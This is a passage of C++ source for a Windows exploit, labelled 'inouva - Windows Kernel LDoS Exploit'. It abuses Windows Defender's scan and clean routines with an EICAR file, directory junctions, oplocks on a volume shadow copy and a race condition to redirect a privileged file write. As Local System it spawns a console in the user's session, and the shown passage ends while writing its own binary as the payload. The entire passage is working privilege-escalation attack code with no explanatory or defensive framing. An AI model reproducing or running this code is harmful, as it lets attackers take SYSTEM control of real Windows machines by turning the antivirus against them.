(HRESULT(WINAPI*)(void*, void*, void***)) GetProcAddress(hm, "MpCleanOpen"); HRESULT(WINAPI* _MpCleanStart)(void*, unsigned int, void*) = (HRESULT(WINAPI*)(void*, unsigned int, void*)) GetProcAddress(hm, "MpCleanStart"); HRESULT(WINAPI* _MpHandleClose)(MPHANDLE) = (HRESULT(WINAPI*)(MPHANDLE)) GetProcAddress(hm, "MpHandleClose"); if (!_MpManagerOpen || !_MpScanStart || !_MpScanResult || !_MpThreatOpen || !_MpThreatEnumerate || !_MpCleanOpen || !_MpCleanStart || !_MpHandleClose) { printf("[!] Failed to initialize DLL imports.\n"); ExitProcess(1); } MPHANDLE hbinding = NULL; HRESULT hres = _MpManagerOpen(NULL, &hbinding); if (hres) { printf("[!] Failed to open Windows Defender RPC interface, error: 0x%0.8X\n", hres); ExitProcess(1); } MPRESOURCE_INFO scaninfo = { 0 }; scaninfo.Scheme = (wchar_t*)L"file"; scaninfo.Path = zippath; MPSCAN_RESOURCES scanrsrc = { 0 }; scanrsrc.dwResourceCount = 1; scanrsrc.pResourceList = &scaninfo; MPHANDLE scanctx = NULL; hres = _MpScanStart(hbinding, MPSCAN_TYPE_RESOURCE, 0x60004000, &scanrsrc, NULL, &scanctx); if (hres) { printf("[!] Failed to start Windows Defender scan, error: 0x%0.8X\n", hres); ExitProcess(1); } DWORD sz = 0x90; void* scanres = malloc(0x90); ZeroMemory(scanres, 0x90); hres = _MpScanResult(scanctx, scanres); if (hres) { printf("[!] Failed to fetch scan results, error: 0x%0.8X\n", hres); ExitProcess(1); } MPHANDLE threatctx = NULL; hres = _MpThreatOpen(scanctx, MPTHREAT_SOURCE_SCAN, MPTHREAT_TYPE_KNOWNBAD, &threatctx); if (hres) { printf("[!] Failed to open threats, error: 0x%0.8X\n", hres); ExitProcess(1); } MPTHREAT_INFO* tinfo = NULL; hres = _MpThreatEnumerate(threatctx, &tinfo); if (hres == 0x1) { printf("[*] No threats found.\n"); ExitProcess(0); } if (hres) { printf("[!] Failed to enumerate threats, error: 0x%0.8X\n", hres); ExitProcess(1); } if (tinfo->ThreatStatus != 0x1) { printf("[!] Unexpected reply from MpThreatEnumerate.\n"); ExitProcess(1); } void** ret = NULL; hres = _MpCleanOpen(scanctx, NULL, &ret); if (hres) { printf("[!] MpCleanOpen failed, error: 0x%0.8X\n", hres); ExitProcess(1); } void* callbackaddr[2] = { (void*)MpCleanCallbackFunction, (void*)MpCleanCallbackFunction }; hres = _MpCleanStart(ret, NULL, callbackaddr); if (hres) { printf("[!] MpCleanStart failed, error: 0x%0.8X\n", hres); ExitProcess(1); } _MpHandleClose(scanctx); _MpHandleClose(threatctx); _MpHandleClose(hbinding); return ERROR_SUCCESS; } char* eicar_data = NULL; DWORD eicar_sz = 0; HANDLE WriteEicar(wchar_t* workdir, wchar_t* isomnt) { wchar_t eicarpath[MAX_PATH] = { 0 }; wsprintf(eicarpath, L"%s\\wermgr.exe", workdir); HANDLE hfile = NULL; UNICODE_STRING _eicarpath = { 0 }; RtlInitUnicodeString(&_eicarpath, eicarpath); OBJECT_ATTRIBUTES eicarpathobjattr = { 0 }; InitializeObjectAttributes(&eicarpathobjattr, &_eicarpath, OBJ_CASE_INSENSITIVE, NULL, NULL); IO_STATUS_BLOCK iostat = { 0 }; NTSTATUS stat = NtCreateFile(&hfile, GENERIC_READ | GENERIC_WRITE | DELETE | SYNCHRONIZE, &eicarpathobjattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ, FILE_OVERWRITE_IF, NULL, NULL, NULL); if (stat) { printf("[!] Failed to create EICAR test file: %ws, error: 0x%0.8X\n", eicarpath, stat); return NULL; } if (eicar_data && eicar_sz) { DWORD writtenbytes = 0; OVERLAPPED ovp = { 0 }; ovp.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL); if (WriteFile(hfile, eicar_data, eicar_sz, &writtenbytes, &ovp) == ERROR_IO_PENDING) { printf("[!] Failed to write EICAR data, error: %d\n", GetLastError()); return NULL; } return hfile; } HANDLE hsrc = NULL; wchar_t eicarsrcpath[MAX_PATH] = { 0 }; wsprintf(eicarsrcpath, L"%s\\wermgr.exe", isomnt); UNICODE_STRING _eicarsrcpath = { 0 }; RtlInitUnicodeString(&_eicarsrcpath, eicarsrcpath); OBJECT_ATTRIBUTES eicarsrcpathobjattr = { 0 }; InitializeObjectAttributes(&eicarsrcpathobjattr, &_eicarsrcpath, OBJ_CASE_INSENSITIVE, NULL, NULL); iostat = { 0 }; stat = NtCreateFile(&hsrc, GENERIC_READ, &eicarsrcpathobjattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN, NULL, NULL, NULL); if (stat) { printf("[!] Failed to open EICAR test file: %ws, error: 0x%0.8X\n", eicarpath, stat); return NULL; } LARGE_INTEGER li = { 0 }; GetFileSizeEx(hsrc, &li); eicar_sz = li.QuadPart; eicar_data = (char*)malloc(li.QuadPart); DWORD retbytes = 0; OVERLAPPED ovp2 = { 0 }; ovp2.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL); if (ReadFile(hsrc, eicar_data, li.QuadPart, &retbytes, &ovp2) == ERROR_IO_PENDING) { printf("[!] Failed to read EICAR data, error: %d\n", GetLastError()); return NULL; } WaitForSingleObject(ovp2.hEvent, INFINITE); CloseHandle(ovp2.hEvent); DWORD writtenbytes = 0; OVERLAPPED ovp = { 0 }; ovp.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL); if (WriteFile(hfile, eicar_data, li.QuadPart, &writtenbytes, &ovp) == ERROR_IO_PENDING) { printf("[!] Failed to write EICAR data, error: %d\n", GetLastError()); return NULL; } WaitForSingleObject(ovp.hEvent, INFINITE); ResetEvent(ovp.hEvent); void* eicar2 = malloc(0x1000); UNICODE_STRING adsname = { 0 }; RtlInitUnicodeString(&adsname, L":WDFOO"); OBJECT_ATTRIBUTES objattr2 = { 0 }; InitializeObjectAttributes(&objattr2, &adsname, OBJ_CASE_INSENSITIVE, hfile, NULL); HANDLE hstream = NULL; stat = NtCreateFile(&hstream, GENERIC_WRITE | SYNCHRONIZE, &objattr2, &iostat, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_CREATE, NULL, NULL, NULL); if (stat) { printf("[!] Failed to create EICAR stream file: %ws%ws, error: 0x%0.8X\n", eicarpath, adsname.Buffer, stat); return NULL; } if (WriteFile(hstream, eicar2, 0x1000, &writtenbytes, &ovp) == ERROR_IO_PENDING) { printf("[!] Failed to write ADS data, error: %d\n", GetLastError()); return NULL; } free(eicar2); CloseHandle(hstream); WaitForSingleObject(ovp.hEvent, INFINITE); CloseHandle(ovp.hEvent); CloseHandle(hsrc); return hfile; } bool MoveToTempDir(HANDLE hobj, wchar_t* targetpath = NULL) { GUID uid = { 0 }; RPC_WSTR wuid = { 0 }; UuidCreate(&uid); UuidToStringW(&uid, &wuid); wchar_t* wuid2 = (wchar_t*)wuid; wchar_t target[MAX_PATH] = { 0 }; if (targetpath) { wcscpy(target, targetpath); } else { ExpandEnvironmentStrings(L"\\??\\%TEMP%\\RP_", target, MAX_PATH); wcscat(target, wuid2); } IO_STATUS_BLOCK iostat = { 0 }; PFILE_RENAME_INFORMATION fri = (PFILE_RENAME_INFORMATION)malloc(sizeof(FILE_RENAME_INFORMATION) + sizeof(target)); ZeroMemory(fri, sizeof(FILE_RENAME_INFORMATION) + sizeof(target)); memmove(&fri->FileName[0], target, wcslen(target) * sizeof(wchar_t)); fri->FileNameLength = wcslen(target) * sizeof(wchar_t); fri->Flags = 0x00000001 | 0x00000040; do { NTSTATUS stat = _NtSetInformationFile(hobj, &iostat, fri, sizeof(FILE_RENAME_INFORMATION) + sizeof(target), (FILE_INFORMATION_CLASS)custom_defs::FileRenameInformationEx); if (stat == STATUS_SUCCESS) return true; if (stat == STATUS_SHARING_VIOLATION) continue; if (stat) { printf("[!] Failed to move directory, error: 0x%0.8X\n", stat); return false; } } while (1); return true; } bool CreateJunction(HANDLE hdir, wchar_t* target) { wchar_t rptarget[MAX_PATH] = { 0 }; wchar_t printname[1] = { L'\0' }; wcscpy(rptarget, target); size_t targetsz = wcslen(rptarget) * 2; size_t printnamesz = 1 * 2; size_t pathbuffersz = targetsz + printnamesz + 12; size_t totalsz = pathbuffersz + REPARSE_DATA_BUFFER_HEADER_LENGTH; REPARSE_DATA_BUFFER* rdb = (REPARSE_DATA_BUFFER*)HeapAlloc(GetProcessHeap(), HEAP_GENERATE_EXCEPTIONS | HEAP_ZERO_MEMORY, totalsz); rdb->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT; rdb->ReparseDataLength = static_cast(pathbuffersz); rdb->Reserved = 0; rdb->MountPointReparseBuffer.SubstituteNameOffset = 0; rdb->MountPointReparseBuffer.SubstituteNameLength = static_cast(targetsz); memcpy(rdb->MountPointReparseBuffer.PathBuffer, rptarget, targetsz + 2); rdb->MountPointReparseBuffer.PrintNameOffset = static_cast(targetsz + 2); rdb->MountPointReparseBuffer.PrintNameLength = static_cast(printnamesz); memcpy(rdb->MountPointReparseBuffer.PathBuffer + targetsz / 2 + 1, printname, printnamesz); OVERLAPPED ov = { 0 }; ov.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL); if (!ov.hEvent) { return false; } DeviceIoControl(hdir, FSCTL_SET_REPARSE_POINT, rdb, totalsz, NULL, 0, NULL, &ov); HeapFree(GetProcessHeap(), NULL, rdb); rdb = NULL; if (GetLastError() == ERROR_IO_PENDING) { DWORD retsz = 0; GetOverlappedResult(hdir, &ov, &retsz, TRUE); } if (GetLastError() != ERROR_SUCCESS) { printf("[!] Failed to create reparse point, error: %d\n", GetLastError()); return false; } return true; } bool MountISO(HANDLE* hiso) { GUID uid = { 0 }; RPC_WSTR wuid = { 0 }; UuidCreate(&uid); UuidToStringW(&uid, &wuid); wchar_t* wuid2 = (wchar_t*)wuid; wchar_t target[MAX_PATH] = { 0 }; ExpandEnvironmentStrings(L"%TEMP%\\RP_", target, MAX_PATH); wcscat(target, wuid2); HANDLE hf = CreateFile(target, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if (!hf || hf == INVALID_HANDLE_VALUE) { printf("[!] Failed to create ISO file, error: %d\n", GetLastError()); return false; } DWORD dwbytes = 0; if (!WriteFile(hf, rawData, sizeof(rawData), &dwbytes, NULL)) { printf("[!] Failed to write data to .iso file, error: %d\n", GetLastError()); return false; } CloseHandle(hf); static const GUID VIRTUAL_STORAGE_TYPE_VENDOR_MS = { 0xEC984AEC, 0xA0F9, 0x47e9, 0x90, 0x1F, 0x71, 0x41, 0x5A, 0x66, 0x34, 0x5B }; VIRTUAL_STORAGE_TYPE vst = { VIRTUAL_STORAGE_TYPE_DEVICE_ISO, VIRTUAL_STORAGE_TYPE_VENDOR_MS }; HANDLE hvirtdisk = NULL; DWORD retval = OpenVirtualDisk(&vst, target, VIRTUAL_DISK_ACCESS_GET_INFO | VIRTUAL_DISK_ACCESS_ATTACH_RO | VIRTUAL_DISK_ACCESS_DETACH, OPEN_VIRTUAL_DISK_FLAG_NONE, NULL, &hvirtdisk); if (retval) { printf("[!] Failed to open virtual disk, error: %d\n", GetLastError()); return false; } retval = AttachVirtualDisk(hvirtdisk, NULL, ATTACH_VIRTUAL_DISK_FLAG_READ_ONLY | ATTACH_VIRTUAL_DISK_FLAG_NO_DRIVE_LETTER, NULL, NULL, NULL); if (retval) { printf("[!] Failed to attach virtual disk, error: %d\n", GetLastError()); return false; } if (hiso) *hiso = hvirtdisk; return true; } BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege) { TOKEN_PRIVILEGES tp; LUID luid; if (!LookupPrivilegeValue(NULL, lpszPrivilege, &luid)) { printf("[!] LookupPrivilegeValue error: %u\n", GetLastError()); return FALSE; } tp.PrivilegeCount = 1; tp.Privileges[0].Luid = luid; if (bEnablePrivilege) tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; else tp.Privileges[0].Attributes = 0; if (!AdjustTokenPrivileges(hToken, FALSE, &tp, 0, (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL)) { printf("[!] AdjustTokenPrivileges error: %u\n", GetLastError()); return FALSE; } if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) { printf("[!] The token does not have the specified privilege.\n"); return FALSE; } return TRUE; } bool IsRunningAsLocalSystem() { HANDLE htoken = NULL; if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &htoken)) { printf("[!] OpenProcessToken failed, error: %d\n", GetLastError()); return false; } TOKEN_USER* tokenuser = (TOKEN_USER*)malloc(MAX_SID_SIZE + sizeof(TOKEN_USER)); DWORD retsz = 0; bool res = GetTokenInformation(htoken, TokenUser, tokenuser, MAX_SID_SIZE + sizeof(TOKEN_USER), &retsz); CloseHandle(htoken); if (!res) return false; return IsWellKnownSid(tokenuser->User.Sid, WinLocalSystemSid); } void LaunchConsoleInSessionId(DWORD sessionid) { HANDLE htoken = NULL; if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &htoken)) return; SetPrivilege(htoken, SE_TCB_NAME, TRUE); SetPrivilege(htoken, SE_ASSIGNPRIMARYTOKEN_NAME, TRUE); SetPrivilege(htoken, SE_IMPERSONATE_NAME, TRUE); SetPrivilege(htoken, SE_DEBUG_NAME, TRUE); HANDLE hnewtoken = NULL; bool res = DuplicateTokenEx(htoken, TOKEN_ALL_ACCESS, NULL, SecurityDelegation, TokenPrimary, &hnewtoken); CloseHandle(htoken); if (!res) return; res = SetTokenInformation(hnewtoken, TokenSessionId, &sessionid, sizeof(DWORD)); if (!res) { CloseHandle(hnewtoken); return; } STARTUPINFO si = { 0 }; si.cb = sizeof(si); PROCESS_INFORMATION pi = { 0 }; CreateProcessAsUser(hnewtoken, L"C:\\Windows\\System32\\conhost.exe", NULL, NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi); CloseHandle(hnewtoken); if (pi.hProcess) CloseHandle(pi.hProcess); if (pi.hThread) CloseHandle(pi.hThread); return; } DWORD WINAPI PoseidonGeneratorThread(void*) { SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_BELOW_NORMAL); WaitForSingleObject(g_poseidonevent, INFINITE); do { BCryptGenRandom(NULL, (PUCHAR)g_poseidonbuf, sizeof(g_poseidonbuf), BCRYPT_USE_SYSTEM_PREFERRED_RNG); } while (!g_poseidonexit); return ERROR_SUCCESS; } DWORD WINAPI PoseidonThread(void*) { GUID uid = { 0 }; RPC_WSTR wuid = { 0 }; UuidCreate(&uid); UuidToStringW(&uid, &wuid); wchar_t* wuid2 = (wchar_t*)wuid; wchar_t target[MAX_PATH] = { 0 }; ExpandEnvironmentStrings(L"%TEMP%\\RP_", target, MAX_PATH); wcscat(target, wuid2); HANDLE hfile = CreateFile(target, GENERIC_ALL, NULL, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_DELETE_ON_CLOSE, NULL); if (!hfile || hfile == INVALID_HANDLE_VALUE) return GetLastError(); WaitForSingleObject(g_poseidonevent, INFINITE); try { do { SetFilePointer(hfile, 0, NULL, FILE_BEGIN); DWORD ret = 0; WriteFile(hfile, g_poseidonbuf, sizeof(g_poseidonbuf), &ret, NULL); } while (!g_poseidonexit); } catch (int e) { } CloseHandle(hfile); return ERROR_SUCCESS; } int main() { printf("============================================================\n"); printf(" inouva - Windows Kernel LDoS Exploit\n"); printf(" Windows 11 25H2 (Build 26200) and later\n"); printf("============================================================\n\n"); ntdllhm = GetModuleHandle(L"ntdll.dll"); if (!ntdllhm) { printf("[!] Failed to get ntdll.dll handle.\n"); return 1; } _NtSetInformationFile = (NTSTATUS(WINAPI*)(HANDLE, PIO_STATUS_BLOCK, PVOID, ULONG, FILE_INFORMATION_CLASS)) GetProcAddress(ntdllhm, "NtSetInformationFile"); _NtDeleteFile = (NTSTATUS(WINAPI*)(POBJECT_ATTRIBUTES)) GetProcAddress(ntdllhm, "NtDeleteFile"); _NtOpenDirectoryObject = (NTSTATUS(WINAPI*)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES)) GetProcAddress(ntdllhm, "NtOpenDirectoryObject"); _NtQueryDirectoryObject = (NTSTATUS(WINAPI*)(HANDLE, PVOID, ULONG, BOOLEAN, BOOLEAN, PULONG, PULONG)) GetProcAddress(ntdllhm, "NtQueryDirectoryObject"); _NtQueryInformationFile = (NTSTATUS(WINAPI*)(HANDLE, PIO_STATUS_BLOCK, PVOID, ULONG, FILE_INFORMATION_CLASS)) GetProcAddress(ntdllhm, "NtQueryInformationFile"); if (!_NtSetInformationFile || !_NtDeleteFile || !_NtOpenDirectoryObject || !_NtQueryDirectoryObject || !_NtQueryInformationFile) { printf("[!] Failed to import NT API functions.\n"); return 1; } g_poseidonevent = CreateEvent(NULL, FALSE, FALSE, NULL); if (!g_poseidonevent) { printf("[!] Failed to create event.\n"); return 1; } if (IsRunningAsLocalSystem()) { printf("[*] Running as Local System.\n"); HANDLE hclient = CreateFile(L"\\\\.\\pipe\\RoguePlanet", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, NULL, NULL); if (!hclient || hclient == INVALID_HANDLE_VALUE) return 1; DWORD sesid = 0; bool sh = GetNamedPipeServerSessionId(hclient, &sesid); CloseHandle(hclient); if (sh) { LaunchConsoleInSessionId(sesid); } return 0; } SYSTEM_INFO sysinfo = { 0 }; GetSystemInfo(&sysinfo); if (sysinfo.dwNumberOfProcessors > 3) { DWORD tid = 0; CreateThread(NULL, 0, PoseidonGeneratorThread, NULL, 0, &tid); for (int i = 0; i < sysinfo.dwNumberOfProcessors; i++) { DWORD tid0 = 0; CreateThread(NULL, 0, PoseidonThread, NULL, 0, &tid0); } printf("[*] Started %d Poseidon threads.\n", sysinfo.dwNumberOfProcessors); } HANDLE hpipe = CreateNamedPipe(L"\\\\.\\pipe\\RoguePlanet", PIPE_ACCESS_DUPLEX, PIPE_WAIT, PIPE_UNLIMITED_INSTANCES, NULL, NULL, NULL, NULL); if (!hpipe || hpipe == INVALID_HANDLE_VALUE) { printf("[!] Failed to create communication pipe, error: %d\n", GetLastError()); return 1; } printf("[*] Stage 1: Mounting ISO...\n"); HANDLE hvirtdisk = NULL; if (!MountISO(&hvirtdisk)) { printf("[!] Failed to mount ISO.\n"); return 1; } printf("[+] ISO mounted successfully.\n"); wchar_t windir2[MAX_PATH] = { 0 }; GetWindowsDirectory(windir2, MAX_PATH); HANDLE hwin = CreateFile(windir2, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL); if (!hwin || hwin == INVALID_HANDLE_VALUE) { printf("[!] Failed to open %ws, error: %d\n", windir2, GetLastError()); return 1; } printf("[*] Stage 2: Creating working directory structure...\n"); wchar_t workdir[MAX_PATH] = { 0 }; GUID uid = { 0 }; RPC_WSTR wuid = { 0 }; UuidCreate(&uid); UuidToStringW(&uid, &wuid); wchar_t* wuid2 = (wchar_t*)wuid; ExpandEnvironmentStrings(L"%TEMP%\\RP_", workdir, MAX_PATH); wcscat(workdir, wuid2); if (!CreateDirectory(workdir, NULL)) { printf("[!] Failed to create work directory, error: %d\n", GetLastError()); return 1; } SetPriorityClass(GetCurrentProcess(), HIGH_PRIORITY_CLASS); SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL); HANDLE hdirtmp = NULL; wchar_t dirtmp[MAX_PATH] = { 0 }; wsprintf(dirtmp, L"\\??\\%s\\wdtest_temp", workdir); UNICODE_STRING _dirtmp = { 0 }; RtlInitUnicodeString(&_dirtmp, dirtmp); OBJECT_ATTRIBUTES dirtmpobjattr = { 0 }; InitializeObjectAttributes(&dirtmpobjattr, &_dirtmp, OBJ_CASE_INSENSITIVE, NULL, NULL); IO_STATUS_BLOCK iostat = { 0 }; NTSTATUS dirstat = NtCreateFile(&hdirtmp, GENERIC_READ | GENERIC_WRITE | DELETE | SYNCHRONIZE, &dirtmpobjattr, &iostat, NULL, NULL, FILE_SHARE_READ, FILE_CREATE, FILE_DIRECTORY_FILE, NULL, NULL); if (dirstat) { printf("[!] Failed to create working directory: %ws, error: 0x%0.8X\n", dirtmp, dirstat); return 1; } wchar_t wddirname[MAX_PATH] = { 0 }; if (!GetWERDir(wddirname)) { return 1; } wchar_t* verdirname = PathFindFileName(wddirname); wsprintf(zippath, L"%s\\%s\\wermgr.exe", workdir, verdirname); HANDLE hdir = NULL; wchar_t maindirname[MAX_PATH] = { 0 }; wsprintf(maindirname, L"\\??\\%s\\%s", workdir, verdirname); UNICODE_STRING _maindirname = { 0 }; RtlInitUnicodeString(&_maindirname, maindirname); OBJECT_ATTRIBUTES maindirobjattr = { 0 }; InitializeObjectAttributes(&maindirobjattr, &_maindirname, OBJ_CASE_INSENSITIVE, NULL, NULL); iostat = { 0 }; dirstat = NtCreateFile(&hdir, GENERIC_READ | FILE_WRITE_DATA | DELETE, &maindirobjattr, &iostat, NULL, NULL, FILE_SHARE_READ, FILE_CREATE, FILE_DIRECTORY_FILE, NULL, NULL); if (dirstat) { printf("[!] Failed to create working directory: %ws, error: 0x%0.8X\n", maindirname, dirstat); return 1; } printf("[*] Stage 3: Writing EICAR test file...\n"); wchar_t _mntpath[MAX_PATH] = { 0 }; ULONG pathsz = MAX_PATH; DWORD retval = GetVirtualDiskPhysicalPath(hvirtdisk, &pathsz, _mntpath); if (retval) { printf("[!] Failed to fetch mounted disk path, error: %d\n", retval); return 1; } wchar_t mntpath[MAX_PATH] = { L"\\Device\\" }; wcscat(mntpath, PathFindFileName(_mntpath)); HANDLE heicar = WriteEicar(maindirname, mntpath); if (!heicar) return 1; printf("[+] EICAR file written successfully.\n"); printf("[*] Stage 4: Triggering Windows Defender scan...\n"); SetEvent(g_poseidonevent); DWORD tid = 0; HANDLE hthread = CreateThread(NULL, 0, WDStartScan, NULL, 0, &tid); if (!hthread) { printf("[!] Failed to create working thread, error: %d\n", GetLastError()); return 1; } printf("[+] Windows Defender scan started.\n"); printf("[*] Stage 5: Triggering race condition...\n"); wchar_t _delpath[MAX_PATH] = { 0 }; wsprintf(_delpath, L"%s\\wermgr.exe", maindirname); UNICODE_STRING delpath = { 0 }; RtlInitUnicodeString(&delpath, _delpath); OBJECT_ATTRIBUTES delobjattr = { 0 }; InitializeObjectAttributes(&delobjattr, &delpath, OBJ_CASE_INSENSITIVE, NULL, NULL); IO_STATUS_BLOCK deliostat = { 0 }; HANDLE hc = NULL; wchar_t vsspath[MAX_PATH] = { 0 }; ShadowCopyFinderThread(vsspath); printf("[*] VSS path: %ws\n", vsspath); CloseHandle(heicar); HANDLE hvss = NULL; wchar_t vsswinpath[MAX_PATH] = { 0 }; wsprintf(vsswinpath, L"%s\\%s\\%s\\wermgr.exe:WDFOO", vsspath, &workdir[3], verdirname); UNICODE_STRING _vsswinpath = { 0 }; RtlInitUnicodeString(&_vsswinpath, vsswinpath); OBJECT_ATTRIBUTES objattr2 = { 0 }; InitializeObjectAttributes(&objattr2, &_vsswinpath, OBJ_CASE_INSENSITIVE, NULL, NULL); iostat = { 0 }; NTSTATUS stat = NtCreateFile(&hvss, GENERIC_READ | SYNCHRONIZE, &objattr2, &iostat, NULL, NULL, NULL, FILE_OPEN, NULL, NULL, NULL); REQUEST_OPLOCK_INPUT_BUFFER opin = { 0 }; opin.StructureLength = sizeof(opin); opin.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION; opin.RequestedOplockLevel = OPLOCK_LEVEL_CACHE_READ | OPLOCK_LEVEL_CACHE_HANDLE; opin.Flags = REQUEST_OPLOCK_INPUT_FLAG_REQUEST; REQUEST_OPLOCK_OUTPUT_BUFFER opout = { 0 }; opout.StructureLength = sizeof(opout); opout.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION; DWORD cb = 0; OVERLAPPED ovoplock = { 0 }; ovoplock.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL); DeviceIoControl(hvss, FSCTL_REQUEST_OPLOCK, &opin, sizeof(opin), &opout, sizeof(opout), &cb, &ovoplock); WaitForSingleObject(ovoplock.hEvent, INFINITE); CloseHandle(hvss); NTSTATUS delstat = NtCreateFile(&hc, DELETE, &delobjattr, &deliostat, NULL, NULL, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_SUPERSEDE, NULL, NULL, NULL); MoveToTempDir(hc); if (!CreateJunction(hdir, mntpath)) return 1; if (hc) CloseHandle(hc); printf("[*] Stage 6: Monitoring for directory changes...\n"); char buff[0x1000] = { 0 }; wchar_t teststr[] = { L"Temp\\TMP" }; do { ZeroMemory(buff, sizeof(buff)); DWORD retbytes = 0; ReadDirectoryChangesW(hwin, buff, sizeof(buff), TRUE, FILE_NOTIFY_CHANGE_FILE_NAME, &retbytes, NULL, NULL); PFILE_NOTIFY_INFORMATION pfni = (PFILE_NOTIFY_INFORMATION)buff; if (pfni->FileNameLength / 2 != 24 || _wcsnicmp(&pfni->FileName[0], teststr, 8) != 0) continue; break; } while (1); printf("[*] Stage 7: Finalizing exploit...\n"); wchar_t workdir2[MAX_PATH] = { L"\\??\\" }; wcscat(workdir2, workdir); if (!CreateJunction(hdir, dirtmp)) { return 1; } wchar_t lockpath[MAX_PATH] = { 0 }; wsprintf(lockpath, L"%s\\wermgr.exe", mntpath); HANDLE hlock1 = NULL; UNICODE_STRING _lockpath = { 0 }; RtlInitUnicodeString(&_lockpath, lockpath); OBJECT_ATTRIBUTES lockpathobjattr = { 0 }; InitializeObjectAttributes(&lockpathobjattr, &_lockpath, OBJ_CASE_INSENSITIVE, NULL, NULL); iostat = { 0 }; CloseHandle(WriteEicar(maindirname, mntpath)); stat = NtCreateFile(&hlock1, GENERIC_READ, &lockpathobjattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN, NULL, NULL, NULL); if (stat) { printf("[!] Failed to open file: %ws, error: 0x%0.8X\n", lockpath, stat); return 1; } if (!LockFile(hlock1, NULL, NULL, MAXDWORD, MAXDWORD)) { printf("[!] Failed to lock file, error: %d\n", GetLastError()); return 1; } HANDLE heicar2 = NULL; wchar_t eicarpath[MAX_PATH] = { 0 }; wsprintf(eicarpath, L"%s\\wermgr.exe", maindirname); UNICODE_STRING _eicarpath = { 0 }; RtlInitUnicodeString(&_eicarpath, eicarpath); OBJECT_ATTRIBUTES eicarpathobjattr = { 0 }; InitializeObjectAttributes(&eicarpathobjattr, &_eicarpath, OBJ_CASE_INSENSITIVE, NULL, NULL); iostat = { 0 }; stat = NtCreateFile(&heicar2, GENERIC_READ, &eicarpathobjattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN, NULL, NULL, NULL); if (stat) { printf("[!] Failed to open file: %ws, error: 0x%0.8X\n", eicarpath, stat); return 1; } wchar_t newfpath[MAX_PATH] = { 0 }; wcscpy(newfpath, maindirname); wcscat(newfpath, L"\\"); do { ZeroMemory(buff, sizeof(buff)); DWORD retbytes = 0; ReadDirectoryChangesW(hdirtmp, buff, sizeof(buff), TRUE, FILE_NOTIFY_CHANGE_SIZE, &retbytes, NULL, NULL); PFILE_NOTIFY_INFORMATION pfni = (PFILE_NOTIFY_INFORMATION)buff; wcscat(newfpath, &pfni->FileName[0]); break; } while (1); if (!LockFile(heicar2, NULL, NULL, MAXDWORD, MAXDWORD)) { printf("[!] Failed to lock EICAR file, error: %d\n", GetLastError()); return 1; } CloseHandle(hwin); REPARSE_GUID_DATA_BUFFER rp_buffer = { 0 }; rp_buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT; DWORD cb2 = 0; OVERLAPPED ov = { 0 }; HANDLE hevent = CreateEvent(NULL, FALSE, FALSE, NULL); ov.hEvent = hevent; DeviceIoControl(hdir, FSCTL_DELETE_REPARSE_POINT, &rp_buffer, REPARSE_GUID_DATA_BUFFER_HEADER_SIZE, nullptr, 0, &cb2, &ov); CloseHandle(ov.hEvent); printf("[*] Stage 8: Writing payload...\n"); HANDLE htempfile = NULL; UNICODE_STRING _newfpath = { 0 }; RtlInitUnicodeString(&_newfpath, newfpath); OBJECT_ATTRIBUTES newfpathobjattr = { 0 }; InitializeObjectAttributes(&newfpathobjattr, &_newfpath, OBJ_CASE_INSENSITIVE, NULL, NULL); iostat = { 0 }; stat = NtCreateFile(&htempfile, GENERIC_READ | GENERIC_WRITE | DELETE, &newfpathobjattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OVERWRITE_IF, NULL, NULL, NULL); if (stat) { printf("[!] Failed to open file: %ws, error: 0x%0.8X\n", newfpath, stat); return 1; } HMODULE module = GetModuleHandle(NULL); wchar_t mx[MAX_PATH] = { 0 }; GetModuleFileName(module, mx, MAX_PATH); HANDLE hself = CreateFile(mx, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (!hself || hself == INVALID_HANDLE_VALUE) { printf("[!] Failed to open current executable, error: %d\n", GetLastError()); return 1; } DWORD readbytes = 0; LARGE_INTEGER li = 